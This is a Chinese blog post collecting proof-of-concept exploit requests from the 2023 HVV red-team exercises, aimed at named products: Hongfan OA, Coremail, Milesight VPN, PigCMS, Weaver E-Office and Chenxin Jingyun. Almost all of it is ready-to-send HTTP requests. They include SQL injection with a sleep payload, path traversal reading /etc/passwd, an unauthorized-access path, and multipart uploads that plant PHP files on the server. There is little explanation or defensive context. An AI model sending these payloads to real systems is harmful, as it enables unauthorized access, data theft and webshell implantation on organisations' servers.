hvv2023_some_poc_exp

0x01 红帆 OA zyy_AttFile.asmx SQL 注入漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /ioffice/prg/interface/zyy_AttFile.asmx HTTP/1.1
Host: 10.250.250.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 383
Content-Type: text/xml; charset=utf-8
Soapaction: "http://tempuri.org/GetFileAtt"
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="utf-8"?><soap:Envelopexmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>
<GetFileAttxmlns="http://tempuri.org/"><fileName>123</fileName></GetFileAtt> </soap:Body></soap:Envelope>

来源:https://bbs.decoyit.com/thread-597-1-1.html

0x02 Coremail 邮件系统未授权访问获取管理员账密

1
2
3
4
/coremail/common/assets/:/:/:/:/:/:/s?
biz=Mzl3MTk4NTcyNw==&mid=2247485877&idx=1&sn=7e5f77db320ccf9013c0b7aa7262
6688chksm=eb3834e5dc4fbdf3a9529734de7e6958e1b7efabecd1c1b340c53c80299ff5c688b
f6adaed61&scene=2

来源:https://github.com/ibaiw/2023Hvv/blob/main/Coremail%20%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E8%8E%B7%E5%8F%96%E7%AE%A1%E7%90%86%E5%91%98%E8%B4%A6%E5%AF%86.md

0x03 Milesight VPN server.js 任意文件读取漏洞

1
2
3
4
5
6
GET /../etc/passwd HTTP/1.1
Host:
Accept: /
Content-Type: application/x-www-form-urlencoded


来源:https://github.com/ibaiw/2023Hvv/blob/main/Milesight%20VPN%20server.js%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

0x04 PigCMS action_flashUpload 任意文件上传漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
POC:
POST /cms/manage/admin.php?m=manage&c=background&a=action_flashUpload
HTTP/1.1
Host:
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----aaa
------aaa
Content-Disposition: form-data; name="filePath"; filename="test.php"
Content-Type: video/x-flv
<?php phpinfo();?>
------aaa



/cms/upload/images/2023/08/11/1691722887xXbx.php

来源:https://github.com/ibaiw/2023Hvv/blob/main/PigCMS%20action_flashUpload%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md

0x05 泛微 E-Office CVE-2023-2523/CVE-2023-2648 任意文件上传

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
POST /E-mobile/App/Ajax/ajax.php?action=mobile_upload_save  HTTP/1.1
Host: 127.0.0.1
Content-Length: 352
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload_quwan"; filename="1.php."
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream
 
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
POST /inc/jquery/uploadify/uploadify.php  HTTP/1.1
Host: 127.0.0.1
Content-Length: 204
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Connection: close
 
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt

来源:https://blog.csdn.net/qq_41904294/article/details/130832416

0x06 辰信景云终端安全管理系统 login SQL注入漏洞

1
2
3
POST /api/user/login

captcha=&password=21232f297a57a5a743894a0e4a801fc3&username=admin'and(select*from(select+sleep(3))a)='

来源:https://github.com/ibaiw/2023Hvv/blob/main/%E8%BE%B0%E4%BF%A1%E6%99%AF%E4%BA%91%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20login%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md

#hvv2023
hvv2023_some_poc_exp
https://blog.njcit.me/2023/08/24/poc_exp/hvv2023-some-poc-exp/
作者
ccadmin
发布于
2023年8月24日
许可协议